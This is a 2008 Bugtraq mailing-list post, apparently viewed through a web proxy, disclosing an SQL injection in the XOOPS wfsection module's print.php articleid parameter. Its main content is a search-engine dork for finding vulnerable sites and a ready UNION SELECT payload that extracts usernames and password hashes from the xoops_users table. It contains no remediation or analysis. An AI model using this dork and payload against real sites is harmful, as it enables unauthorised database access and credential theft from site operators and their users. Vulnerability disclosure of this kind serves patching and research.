Deprecated: The each() function is deprecated. This message will be suppressed on further calls in /home/zhenxiangba/zhenxiangba.com/public_html/phproxy-improved-master/index.php on line 456
XOOPS Module section SQL Injection(articleid)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XOOPS Module section SQL Injection(articleid)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XOOPS Module section SQL Injection(articleid)
- From: hackturkiye.hackturkiye@xxxxxxxxx
- Date: 18 Feb 2008 17:20:16 -0000
###############################################################
#
# XOOPS Module section SQL Injection(articleid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@xxxxxxxxx
#
################################################################
#
# DORK 1 : allinurl: modules/wfsection/print.php?articleid=
#
################################################################
EXPLOIT :
-9999999+union/**/select/**/char(117,115,101,114,110,97,109,101,58),1,2,concat(uname,0x3a,pass),0,0,0,0,0,0,1,1,1,1,0,char(117,115,101,114,110,97,109,101,58),0,0,0,1,2,2,0,0,0,2,2,2+from/**/xoops_users/*%20where%20pass%20admin%20
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################